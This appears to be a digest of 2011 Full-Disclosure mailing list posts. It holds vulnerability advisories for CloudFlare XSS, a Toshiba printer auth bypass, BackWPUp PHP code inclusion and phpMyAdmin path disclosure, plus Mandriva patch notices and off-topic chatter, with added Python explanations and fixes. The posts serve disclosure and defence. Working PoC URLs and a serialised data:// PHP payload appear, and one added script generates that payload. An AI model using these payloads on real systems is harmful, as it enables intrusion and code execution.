[Full-disclosure] http://anti-virus.cloudflare.com XSS(Cross Site Scripting) Vulnerability
0x1 Site: http://anti-virus.cloudflare.com
0x3 Author: Sandeep Kamble
0x4 Reported: October 12, 2011
0x6 Public Release: October 17, 2011
0x7 Status: Fixed

Description:
Anti-virus.cloudflare.com is a service for avoiding spam. This project aims to stop attacks and educate visitors with infected computers about how they can clean up their machines.

Affected Variable:
?b_src=

Exploit:
Executing JavaScript using the vulnerable variable called ?b_src=. This attack is commonly known as Cross Site Scripting (XSS). The affected script on anti-virus.cloudflare.com has a stored XSS attack which can be used for grabbing the cookies.

POC:
http://anti-virus.cloudflare.com/cdn-cgi/anti-virus-challenge?h=772e6578706c6f69742d64622e636f6d2c6578706c6f69742d64622e636f6d&x=f1cd78c0ef2c1d7505afe19491fa0477&b_src=<script>alert('Document.cookie')</script>

Sandeep Kamble
www.sandeepkamble.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
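The bug class in the post above, reflected parameter to script execution, and its fix, as an added example that is not CloudFlare's code or the poster's. The page template and the way `b_src` is echoed are assumptions; the only facts taken from the post are the parameter name and the `<script>alert(...)</script>` payload. The dummy `h` and `x` values in `poc_query()` are constructed.

```python
"""Reflected XSS through an unencoded query parameter, and the contextual fix.

Added example for the advisory above, not CloudFlare's code. The page template and
the way `b_src` is echoed are assumptions; the only facts taken from the post are the
parameter name and the <script>alert(...)</script> payload.
"""
import html
from urllib.parse import parse_qs, quote

# Constructed stand-in for the PoC payload above.
POC_PAYLOAD = "<script>alert(document.cookie)</script>"


def _param(query: str, name: str) -> str:
    return parse_qs(query, keep_blank_values=True).get(name, [""])[0]


def render_vulnerable(query: str) -> str:
    """Assumed bug: `b_src` is echoed into an attribute and into text with no encoding."""
    b_src = _param(query, "b_src")
    return f'<img src="{b_src}"><p>Loaded from {b_src}</p>'


def render_fixed(query: str) -> str:
    """Same page with output encoding chosen per context plus a scheme allow-list."""
    b_src = _param(query, "b_src")
    # Attribute context: html.escape(quote=True) also encodes " and ', so the value cannot
    # close the attribute and add onerror=...; a javascript: URL would survive encoding,
    # so only http(s) is accepted in src.
    attr = html.escape(b_src, quote=True) if b_src.lower().startswith(("http://", "https://")) else ""
    # Text context: encoding < > & " ' is enough to stop the payload from becoming markup.
    text = html.escape(b_src, quote=True)
    return f'<img src="{attr}"><p>Loaded from {text}</p>'


def reflected_unencoded(body: str, payload: str = POC_PAYLOAD) -> bool:
    """The check a tester runs over a response: does the raw payload come back verbatim?"""
    return payload in body


def poc_query(payload: str = POC_PAYLOAD) -> str:
    """Query string as a browser would send the PoC (h and x are constructed dummy values)."""
    return "h=00&x=00&b_src=" + quote(payload, safe="")


if __name__ == "__main__":
    print("vulnerable reflects payload:", reflected_unencoded(render_vulnerable(poc_query())))
    print("fixed reflects payload:     ", reflected_unencoded(render_fixed(poc_query())))
```

`reflected_unencoded()` is the same test the PoC URL performs by hand: request the page with the payload in `b_src` and look for it unchanged in the body. Encoding alone does not cover a value that lands in a URL attribute, which is why `render_fixed()` also refuses anything that is not an http(s) URL there.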
Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
On Sun, Oct 16, 2011 at 7:10 PM, Thor (Hammer of God) t...@hammerofgod.com wrote:
> He already talks about how he's already thought about that in a prior article:
> http://gawker.com/5850025/right+wing-rabble+rouser-leaks-thousands-of-occupy-wall-street-emails
>
> Lol
>
> Best of luck to him (he's playing a dangerous game).

Does the Darwin Awards have a category for dumb computer related decisions?

Jeff

> -----Original Message-----
> From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Jeffrey Walton
> Sent: Sunday, October 16, 2011 4:05 PM
> To: Ivan .
> Cc: full-disclosure
> Subject: Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
>
> On Sun, Oct 16, 2011 at 6:56 PM, Ivan . ivan...@gmail.com wrote:
>> http://gawker.com/5850054/meet-the-guy-who-snitched-on-occupy-wall-street-to-the-fbi-and-nypd
>
> Thomas Ryan is definitely not the brightest fellow in computer security:
>
>> We have been heavily monitoring Occupy Wall Street, and Anonymous.
>
> Aaron Barr did similar, ruined the company he worked for (HBGary Federal) and lost his job in the process.
Re: [Full-disclosure] Breaking the links: Exploiting the linker
CVEs have now been assigned to the two previously reported bugs as follows:

1) http://www.nth-dimension.org.uk/downloads.php?id=83 - Privesc attack using DB2 from normal user to root. The PoC is for Linux, but based on testing the AIX version looks iffy too, although I couldn't get gcc to generate a valid library to exploit it. CVE-2011-4061.

FWIW I now have a version of the exploit for this working on AIX, based on a copy of kbbacf1 from IBM Tivoli Monitoring 6.1.0.6. It therefore appears that the vulnerable version of kbbacf1 isn't just shipped with DB2.

2) http://www.nth-dimension.org.uk/downloads.php?id=80 - Generic attack on the QNX runtime linker which abuses an arbitrary file overwrite and race condition to get root. CVE-2011-4060.

Cheers,
Tim
--
Tim Brown
mailto:t...@nth-dimension.org.uk
http://www.nth-dimension.org.uk/
[Full-disclosure] foofus.net security advisory - Toshiba EStudio Multifunction Printer Authentication Bypass
Foofus.net Security Advisory: foofus-20111016

Title: Toshiba EStudio Multifunction Printer Authentication Bypass
Version: e-Studio series devices
Vendor: Toshiba
Release Date: 01/29/2010
Issue Status: Contacted by Vendor on 2/25/2011 about release of a firmware patch.

1. Summary:
Toshiba e-Studio devices were found to be vulnerable to an authentication bypass vulnerability.

2. Description:
The authentication is easily bypassed by adding an extra / in the URL after TopAccess.
Example: http://<IP Address>/TopAccess//Administrator/Setup/ScanToFile/List.htm

3. Impact:
Exploiting this allows an adversary to gain access to the device via the web management interface without authenticating.

4. Affected Products:
All e-Studio devices tested against have been found to be vulnerable as of July 2011. Validation of specific firmware versions has not been conducted, due to limited access to devices.
Note: It is possible devices with the latest release of firmware may not be vulnerable. These have not been tested.

5. Solution:
Contact vendor and request firmware upgrade to patch security issue.

6. Time Table:
01/29/2011 Reported vulnerability.
02/25/2011 Vendor acknowledged issue and stated firmware patch would soon be available.
March - July 2011 Continued attempts to contact vendor to confirm firmware patch. Requests were never answered.
10/16/2011 Published advisory.

7. Credits:
Discovered by Deral Heiland "PercX"

8. Reference:
http://praeda.foofus.net
http://www.foofus.net/?page_id=411

The Foofus.Net team is an assortment of security professionals located throughout the United States.
http://www.foofus.net
Follow percX on Twitter @Percent_X
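Why an extra slash defeats a login check, and what the check should do instead, as an added example that is not Toshiba's code. The device's real access filter is not public, so the literal prefix comparison in `requires_auth_naive()` is an assumption modelled on the symptom the advisory reports; the protected prefix is the one from the example URL above.

```python
"""Authorisation bypass through an un-normalised URL path, and the fix.

Added example, not Toshiba's code: the device's real access check is not public, so the
prefix comparison below is an assumption modelled on the symptom in the advisory (an
extra "/" after TopAccess skips the login check). The protected prefix is taken from
the example URL in the advisory.
"""
import posixpath
from urllib.parse import unquote

PROTECTED_PREFIXES = ("/TopAccess/Administrator/",)


def requires_auth_naive(path: str) -> bool:
    """Assumed vulnerable check: literal prefix match on the raw request path,
    so "/TopAccess//Administrator/..." is not recognised as protected although the
    file server still resolves it to the same resource."""
    return path.startswith(PROTECTED_PREFIXES)


def canonicalize(path: str) -> str:
    """Reduce a request path to one canonical spelling before any policy decision.

    Percent-decodes (twice, to catch double encoding; do this only if the server
    itself decodes twice), collapses repeated slashes and "." / ".." segments, and
    lower-cases (conservative: protects more paths on a case-insensitive server).
    """
    decoded = unquote(unquote(path))
    # posixpath.normpath collapses "//" and dot segments; forcing a single leading "/"
    # avoids the POSIX rule that keeps a leading "//" intact.
    norm = posixpath.normpath("/" + decoded.lstrip("/"))
    if decoded.endswith("/") and not norm.endswith("/"):
        norm += "/"  # keep the directory marker so prefix matching still works
    return norm.lower()


def requires_auth_fixed(path: str) -> bool:
    """Normalise first, then compare; the directory itself (no trailing slash) counts too."""
    canon = canonicalize(path)
    for prefix in PROTECTED_PREFIXES:
        p = prefix.lower()
        if canon == p.rstrip("/") or canon.startswith(p):
            return True
    return False


if __name__ == "__main__":
    for probe in ("/TopAccess/Administrator/Setup/ScanToFile/List.htm",
                  "/TopAccess//Administrator/Setup/ScanToFile/List.htm",
                  "/TopAccess/./Administrator/Setup/ScanToFile/List.htm",
                  "/TopAccess/%41dministrator/Setup/ScanToFile/List.htm"):
        print(f"{probe:55} naive={requires_auth_naive(probe)!s:5} fixed={requires_auth_fixed(probe)}")
```

The same list of probes is what a tester runs against the device: if any spelling of the administrator path returns the page without a login, the filter is comparing before normalising. The durable fix is to make the authorisation decision on the path the file handler will actually open, never on the bytes the client sent.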
[Full-disclosure] WordPress Plugin BackWPUp 2.1.4 - Security Advisory - SOS-11-012
Sense of Security - Security Advisory - SOS-11-012

Release Date.             17-Oct-2011
Vendor Notification Date. 14-Oct-2011
Product.                  BackWPUp
Platform.                 WordPress
Affected versions.        2.1.4
Severity Rating.          High
Impact.                   System access
Attack Vector.            Remote without authentication
Solution Status.          Upgrade to 2.1.5
CVE reference.            Not yet assigned

Details.
A vulnerability has been discovered in the WordPress plugin BackWPup 2.1.4 which can be exploited to execute local or remote code on the web server.

There is a lack of data validation on the BackWPUpJobTemp POST parameter of job/wp_export_generate.php, allowing an attacker to specify FTP resources as input. This resource is downloaded and deserialised by the wp_export_generate.php script, and variables from this deserialisation are later passed to require_once.

Proof of Concept.
Upload the following to a publicly accessible FTP server and name it file.txt.running:

a:2:{s:7:"WORKING";a:1:{s:5:"NONCE";s:3:"123";}s:8:"ABS_PATH";s:25:"data://text/plain;base64,PD8gcGhwaW5mbygpOyBkaWUoKTs=";}

This serialised string creates an array containing:

$infile['WORKING'] = array();
$infile['WORKING']['NONCE'] = '123';
$infile['ABS_PATH'] = 'data://text/plain;base64,PD8gcGhwaW5mbygpOyBkaWUoKTs=';

Once uploaded, ensure the FTP file is writeable and issue a POST to job/wp_export_generate.php with the following parameters:

$_POST['BackWPupJobTemp'] = 'ftp://user:password@10.2.0.128/file.txt';
$_POST['nonce'] = '123';
$_POST['type'] = 'getxmlexport';

The string included in $infile['ABS_PATH'] will then have wp-load.php appended to it and passed to require_once. In the above example the code contained in the base64 encoded string will then be executed.

The above code executes 'phpinfo(); die();'. allow_url_include will need to be on to allow for remote file inclusion; however, local file inclusion could easily be achieved by using null byte injection.

Solution.
Upgrade to BackWPUp 2.1.5 or above.

Discovered by.
Phil Taylor from Sense of Security Labs.
About us.
Sense of Security is a leading provider of information security and risk management solutions. Our team has expert skills in assessment and assurance, strategy and architecture, and deployment through to ongoing management. We are Australia's premier application penetration testing firm and trusted IT security advisor to many of the country's largest organisations.

Sense of Security Pty Ltd
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA
T: +61 (0)2 9290
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au
E: i...@senseofsecurity.com.au
Twitter: @ITsecurityAU

The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-11-012.pdf

Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php
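The job file from the proof of concept above, built and decoded in code, as an added example that is neither Sense of Security's nor the plugin's. It implements the small subset of PHP's `serialize()` format the PoC needs (ASCII strings and string-keyed arrays) and computes the `s:N:` length fields itself, then shows what `require_once` receives and what the `data://` wrapper decodes to. `is_safe_abs_path()` is an assumption about what a hardened plugin should check, not the vendor's 2.1.5 patch.

```python
"""Build and decode the serialised BackWPup job file from the advisory.

Added example, not Sense of Security's or the plugin's code. It implements enough of
PHP's serialize() format (ASCII strings and string-keyed arrays) to generate the job
file, computing the length fields itself, and to show what the deserialised values are
before they reach require_once. The hardened check at the end is an assumption about
what a fixed plugin should do, not the vendor's 2.1.5 patch.
"""
import base64
import re

PHP_CODE = "<? phpinfo(); die();"  # what the base64 string in the PoC decodes to
DATA_PREFIX = "data://text/plain;base64,"


def php_serialize(value) -> str:
    """Serialise a str or a dict with str keys (nested allowed) in serialize() notation."""
    if isinstance(value, str):
        if not value.isascii():
            raise ValueError("helper handles ASCII only (PHP counts bytes, not characters)")
        return f's:{len(value)}:"{value}";'
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    raise TypeError(f"unsupported type {type(value).__name__}")


def php_unserialize(data: str):
    """Parser for the subset php_serialize() emits; raises ValueError on malformed input."""
    def parse(pos):
        tag = data[pos] if pos < len(data) else ""
        if tag == "s":
            m = re.match(r's:(\d+):"', data[pos:])
            if not m:
                raise ValueError(f"bad string header at {pos}")
            n, start = int(m.group(1)), pos + m.end()
            if data[start + n:start + n + 2] != '";':
                raise ValueError(f"string length mismatch at {pos}")
            return data[start:start + n], start + n + 2
        if tag == "a":
            m = re.match(r"a:(\d+):\{", data[pos:])
            if not m:
                raise ValueError(f"bad array header at {pos}")
            count, pos = int(m.group(1)), pos + m.end()
            out = {}
            for _ in range(count):
                key, pos = parse(pos)
                out[key], pos = parse(pos)
            if data[pos:pos + 1] != "}":
                raise ValueError(f"unterminated array at {pos}")
            return out, pos + 1
        raise ValueError(f"unsupported tag {tag!r} at {pos}")
    value, end = parse(0)
    if end != len(data):
        raise ValueError("trailing data after serialised value")
    return value


def build_job_file(code: str = PHP_CODE, nonce: str = "123") -> str:
    """Reproduce the PoC job file: ABS_PATH is a data:// stream wrapper URL, not a directory."""
    abs_path = DATA_PREFIX + base64.b64encode(code.encode()).decode()
    return php_serialize({"WORKING": {"NONCE": nonce}, "ABS_PATH": abs_path})


def included_path(job_file: str) -> str:
    """What the vulnerable script hands to require_once: $infile['ABS_PATH'] . 'wp-load.php'."""
    return php_unserialize(job_file)["ABS_PATH"] + "wp-load.php"


def decode_data_url(path: str) -> str:
    """Recover the PHP source a base64 data:// URL would feed to the interpreter."""
    if not path.startswith(DATA_PREFIX):
        raise ValueError("not a base64 data:// URL")
    return base64.b64decode(path[len(DATA_PREFIX):]).decode()


def is_safe_abs_path(path: str) -> bool:
    """Assumed hardening: accept only a plain absolute directory, never a stream wrapper,
    a null byte (the LFI trick mentioned in the advisory) or a parent-directory segment."""
    return (path.startswith("/") and "://" not in path
            and "\x00" not in path and ".." not in path.split("/"))


if __name__ == "__main__":
    job = build_job_file()
    print(job)
    print("require_once receives:", included_path(job))
    print("data:// decodes to:   ", decode_data_url(php_unserialize(job)["ABS_PATH"]))
```

Two things worth noticing. The length field of the `ABS_PATH` string is whatever `len()` says it is, which is why the helper computes it rather than copying a number; a wrong `s:N:` makes PHP's `unserialize()` fail and the payload inert. And the root cause is not deserialisation by itself: a string from an attacker-controlled file reaches `require_once`, and PHP's stream wrappers turn that into code execution without any file ever landing on disk, which is what `is_safe_abs_path()` refuses.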
[Full-disclosure] [Announcement] ClubHack Magazine - Call for Articles
Hello All,

ClubHack Mag is seeking submissions for the next issue, Issue 22 - November 2011.

Seeking articles on the following topics:
- Forensics and Anti-Forensics
- Mobile, Telecom Hacking and Security

ClubHack Magazine has different sections:
1. Tech Gyan - Main article of the magazine. Covers various technical aspects in security, latest hacking trends and techniques.
2. Tool Gyan - Covers various hacking and security tools.
3. Mom's Guide - Dedicated to the common man. Covers basics and fundamentals.
4. Legal Gyan - IT Law with respect to hacking explained in simple language.
5. Matriux Vibhag - Articles on the Matriux Security Distro.

*You too can design and submit a poster for the magazine!

A few guidelines:
1) Keep the language as easy as possible. Screenshots will be of help.
2) Along with the article, send us your photograph and a small intro.
3) Submission due date - 25th of this month

Send in your articles to abhij...@clubhack.com

Regards,
Abhijeet Patil,
Co-Founder, CHMag
URL: http://chmag.in
http://clubhack.com
Cell: +91-9923800379
[Full-disclosure] phpMyAdmin 3.4.5 – Full path disclosure in phpmyadmin.css.php
phpMyAdmin 3.4.5 suffers from insufficient input validation of the parameter js_frame in phpmyadmin.css.php, exposing information that could be used in further attacks.

CVE Entry: CVE-2011-3646
CWE: CWE-20, CWE-200
PMASA Entry: PMASA-2011-15

= Description
The script returns an error message containing the full path if the js_frame parameter is defined as an array.

= Exploit
No authentication needed to exploit this vulnerability.
http://example.com/path_to_phpmyadmin/phpmyadmin.css.php?js_frame[]=right

= Official fix
http://phpmyadmin.git.sourceforge.net/git/gitweb.cgi?p=phpmyadmin/phpmyadmin;a=commitdiff;h=d35cba980893aa6e6455fd6e6f14f3e3f1204c52

= Credits
Discovered by Mihail Ursu ( http://securitate.md/ ) on 12 Sep 2011.

= Disclosure Timeline
Reported to vendor on 12 Sep 2011.
Confirmation from vendor 21 Sep 2011.
Patch confirmation 4 Oct 2011.
Official fix and public disclosure 17 Oct 2011.
Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
On Mon, 17 Oct 2011 03:48:46 EDT, Jeffrey Walton said:
> Does the Darwin Awards have a category for dumb computer related decisions?

Hmm.. for computer related ones? Good question. The Darwin Awards are for those who remove themselves from the gene pool in *spectacular* ways. They disallow entrants for reasons of mental disease or defect -- so failing to reproduce just because you're a troll living in your parent's basement loses twice - it's commonplace, not spectacular, and it usually isn't a result of a conscious decision you made.

Having said that, I suppose it *is* possible. Consider the (hopefully hypothetical) example of an extreme overclocker who does something predictably stupid and ends up with a lapful of liquid nitrogen and a case of severe frostbite. Gives a whole new meaning to "shatter attack" ;)

Yeah, *that* would get a Darwin. ;)
[Full-disclosure] [ MDVSA-2011:151 ] libpng
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2011:151
http://www.mandriva.com/security/
_______________________________________________________________________

Package : libpng
Date    : October 17, 2011
Affected: 2010.1, Enterprise Server 5.0
_______________________________________________________________________

Problem Description:

Multiple vulnerabilities have been discovered and corrected in libpng:

The png_format_buffer function in pngerror.c in libpng allows remote attackers to cause a denial of service (application crash) via a crafted PNG image that triggers an out-of-bounds read during the copying of error-message data. NOTE: this vulnerability exists because of a CVE-2004-0421 regression (CVE-2011-2501).

Buffer overflow in libpng, when used by an application that calls the png_rgb_to_gray function but not the png_set_expand function, allows remote attackers to overwrite memory with an arbitrary amount of data, and possibly have unspecified other impact, via a crafted PNG image (CVE-2011-2690).

The png_err function in pngerror.c in libpng makes a function call using a NULL pointer argument instead of an empty-string argument, which allows remote attackers to cause a denial of service (application crash) via a crafted PNG image (CVE-2011-2691). NOTE: This does not affect the binary packages in Mandriva, but could affect users if PNG_NO_ERROR_TEXT is defined using the libpng-source-1.?.?? package.

The png_handle_sCAL function in pngrutil.c in libpng does not properly handle invalid sCAL chunks, which allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a crafted PNG image that triggers the reading of uninitialized memory (CVE-2011-2692).

The updated packages have been patched to correct these issues.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2501
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2690
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2691
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2692
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2010.1:
75cf5cc9e56f7cd3c621ea2ba8899df3  2010.1/i586/libpng3-1.2.43-1.2mdv2010.2.i586.rpm
af2f3f6696d67efd19d2bf7cc30207da  2010.1/i586/libpng-devel-1.2.43-1.2mdv2010.2.i586.rpm
5190271f8394e5114aeb3b9de6a679bc  2010.1/i586/libpng-source-1.2.43-1.2mdv2010.2.i586.rpm
3d7b05502fd2c613f6e263c2bc4baf51  2010.1/i586/libpng-static-devel-1.2.43-1.2mdv2010.2.i586.rpm
4d26abf5f53ddfb40af4432b2ffe7215  2010.1/SRPMS/libpng-1.2.43-1.2mdv2010.2.src.rpm

Mandriva Linux 2010.1/X86_64:
3a8041586d3f6a3666231ec9744efa30  2010.1/x86_64/lib64png3-1.2.43-1.2mdv2010.2.x86_64.rpm
3baefc4e0b5f560382ef411349142810  2010.1/x86_64/lib64png-devel-1.2.43-1.2mdv2010.2.x86_64.rpm
63db8d8b4313907f1b7d18ac4cf7c30f  2010.1/x86_64/lib64png-static-devel-1.2.43-1.2mdv2010.2.x86_64.rpm
bb8d9ac1982ae3591e701f1e32193733  2010.1/x86_64/libpng-source-1.2.43-1.2mdv2010.2.x86_64.rpm
4d26abf5f53ddfb40af4432b2ffe7215  2010.1/SRPMS/libpng-1.2.43-1.2mdv2010.2.src.rpm

Mandriva Enterprise Server 5:
2dc72977964282d6b9b71f02daf11875  mes5/i586/libpng3-1.2.31-2.4mdvmes5.2.i586.rpm
3a7a29b3ce673a6023b2ebd69702de77  mes5/i586/libpng-devel-1.2.31-2.4mdvmes5.2.i586.rpm
311e83f11ecca6e10492be05e93af450  mes5/i586/libpng-source-1.2.31-2.4mdvmes5.2.i586.rpm
6e78659cd2132ab936672d26307508c3  mes5/i586/libpng-static-devel-1.2.31-2.4mdvmes5.2.i586.rpm
7716bbc53dbf07a4bcf647d19c872321  mes5/SRPMS/libpng-1.2.31-2.4mdvmes5.2.src.rpm

Mandriva Enterprise Server 5/X86_64:
30fbcd1e778a334751efb67347896a74  mes5/x86_64/lib64png3-1.2.31-2.4mdvmes5.2.x86_64.rpm
98f8b1bcae2ca325b95d84b03a8a21c3  mes5/x86_64/lib64png-devel-1.2.31-2.4mdvmes5.2.x86_64.rpm
8388f578116a05c96b2ef54120b0966a  mes5/x86_64/lib64png-static-devel-1.2.31-2.4mdvmes5.2.x86_64.rpm
e92d9e5a9d2cec26614e0073bf8772a4  mes5/x86_64/libpng-source-1.2.31-2.4mdvmes5.2.x86_64.rpm
7716bbc53dbf07a4bcf647d19c872321  mes5/SRPMS/libpng-1.2.31-2.4mdvmes5.2.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
On Mon, Oct 17, 2011 at 06:03, valdis.kletni...@vt.edu wrote:
> On Mon, 17 Oct 2011 03:48:46 EDT, Jeffrey Walton said:
>> Does the Darwin Awards have a category for dumb computer related decisions?
>
> [...]
>
> Having said that, I suppose it *is* possible. Consider the (hopefully hypothetical) example of an extreme overclocker who does something predictably stupid and ends up with a lapful of liquid nitrogen and a case of severe frostbite. Gives a whole new meaning to "shatter attack" ;)
>
> Yeah, *that* would get a Darwin. ;)

I have heard rumors of an instance that would qualify:

Supposedly there was a fellow who knew he was under police surveillance for bad computing behavior of some sort or another, and had prepared for a raid by outfitting his residence with video cameras, and his computer with a kill switch. Little did he know that he was more literal than expected. He had packed the computer case full of thermite, rather than simply putting an ounce or three on top of the hard drive. He was next to the computer when he noticed a raid descending, and he hit the kill switch. There wasn't much left of the room he was in...

I've not been able to verify this story, but it does come from a source that I consider reliable.

Kurt
Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
--On October 17, 2011 9:03:21 AM -0400 valdis.kletni...@vt.edu wrote:
> On Mon, 17 Oct 2011 03:48:46 EDT, Jeffrey Walton said:
>> Does the Darwin Awards have a category for dumb computer related decisions?
>
> Hmm.. for computer related ones? Good question. The Darwin Awards are for those who remove themselves from the gene pool in *spectacular* ways. They disallow entrants for reasons of mental disease or defect -- so failing to reproduce just because you're a troll living in your parent's basement loses twice - it's commonplace, not spectacular, and it usually isn't a result of a conscious decision you made.

OTOH, don't you think someone who qualifies for a Darwin Award has demonstrated a mental deficiency?

--
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions are my own and not those of my employer.
***
"It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead." Thomas Jefferson
"There are some ideas so wrong that only a very intelligent person could believe in them." George Orwell
Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
On Mon, 17 Oct 2011 10:32:04 CDT, Paul Schmehl said:
> OTOH, don't you think someone who qualifies for a Darwin Award has demonstrated a mental deficiency?

There's a difference between not having any brains and not using what you got.

http://www.darwinawards.com/rules/rules4.html

"The candidate must be capable of sound judgment. Humans are generally capable of sound judgment, except those with mental handicaps that render them unable to fully comprehend the ramifications of their actions."

Departing the gene pool in a spectacularly stupid way because you *can't* think it through is just a sad event. Doing it because you *didn't bother* thinking it through is Darwin Award fodder.

Somebody mentioned a (probably apocryphal) incident using thermite - that's a good example. The person was *aware* that thermite burns *really hot*, and didn't take proper care. This is a totally different situation from some poor soul with Down's Syndrome, who sees thermite burn once, and thinks it's *really* pretty and decides to light some himself...
Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
I don't think I have any mental deficiency, but I've certainly done things that almost got me a Darwin Award. I think "momentary lack of reason" better describes it.

> -----Original Message-----
> From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Paul Schmehl
> Sent: Monday, October 17, 2011 8:32 AM
> To: valdis.kletni...@vt.edu; noloa...@gmail.com
> Cc: full-disclosure
> Subject: Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
>
> [...]
>
> OTOH, don't you think someone who qualifies for a Darwin Award has demonstrated a mental deficiency?
[Full-disclosure] [ MDVSA-2011:152 ] ncompress
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2011:152
http://www.mandriva.com/security/
_______________________________________________________________________

Package : ncompress
Date    : October 17, 2011
Affected: 2010.1, Enterprise Server 5.0
_______________________________________________________________________

Problem Description:

A vulnerability has been found and corrected in ncompress:

An integer underflow leading to array index error was found in the way gzip used to decompress files / archives, compressed with the Lempel-Ziv-Welch (LZW) compression algorithm. A remote attacker could provide a specially-crafted LZW compressed gzip archive, which once decompressed by a local, unsuspecting user would lead to gzip crash, or, potentially to arbitrary code execution with the privileges of the user running gzip (CVE-2010-0001).

The updated packages have been upgraded to the 4.2.4.4 version which is not vulnerable to this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0001
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2010.1:
21d31dc01147a832568ca56e1dd61447  2010.1/i586/ncompress-4.2.4.4-0.1mdv2010.2.i586.rpm
ba9d02cc91a5ebb50e0f8d4c63cb23ec  2010.1/SRPMS/ncompress-4.2.4.4-0.1mdv2010.2.src.rpm

Mandriva Linux 2010.1/X86_64:
d289f3b0e72026349addcaa45c92bb95  2010.1/x86_64/ncompress-4.2.4.4-0.1mdv2010.2.x86_64.rpm
ba9d02cc91a5ebb50e0f8d4c63cb23ec  2010.1/SRPMS/ncompress-4.2.4.4-0.1mdv2010.2.src.rpm

Mandriva Enterprise Server 5:
82d9b6490242cb9257f186f0cfcb682e  mes5/i586/ncompress-4.2.4.4-0.1mdvmes5.2.i586.rpm
564695e65868d680d3b218307b24189a  mes5/SRPMS/ncompress-4.2.4.4-0.1mdvmes5.2.src.rpm

Mandriva Enterprise Server 5/X86_64:
bc945e39f76a798f5010aa541647cd8c  mes5/x86_64/ncompress-4.2.4.4-0.1mdvmes5.2.x86_64.rpm
564695e65868d680d3b218307b24189a  mes5/SRPMS/ncompress-4.2.4.4-0.1mdvmes5.2.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
     <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFOnC1TmqjQ0CJFipgRApjMAJsGcaAY2/rFacsCr2KD3+x9ob++6wCgz0RH
nV9S5cL4mECq3np/6SUF/zI=
=1ouk
-----END PGP SIGNATURE-----
[Full-disclosure] [ MDVSA-2011:153 ] libxfont
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2011:153
http://www.mandriva.com/security/
_______________________________________________________________________

Package : libxfont
Date    : October 17, 2011
Affected: 2010.1, 2011, Enterprise Server 5.0
_______________________________________________________________________

Problem Description:

A vulnerability has been discovered and corrected in libxfont:

The LZW decompressor in (1) the BufCompressedFill function in fontfile/decompress.c in X.Org libXfont before 1.4.4 and (2) compress/compress.c in 4.3BSD, as used in zopen.c in OpenBSD before 3.8, FreeBSD, NetBSD, FreeType 2.1.9, and other products, does not properly handle code words that are absent from the decompression table when encountered, which allows context-dependent attackers to trigger an infinite loop or a heap-based buffer overflow, and possibly execute arbitrary code, via a crafted compressed stream, a related issue to CVE-2006-1168 and CVE-2011-2896 (CVE-2011-2895).

The updated packages have been patched to correct this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2895
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2010.1:
482f9f25111c17bbf7eab3e526c02d2a  2010.1/i586/libxfont1-1.4.1-1.1mdv2010.2.i586.rpm
e53b66dcacc6908578d2d663fc0b4e32  2010.1/i586/libxfont1-devel-1.4.1-1.1mdv2010.2.i586.rpm
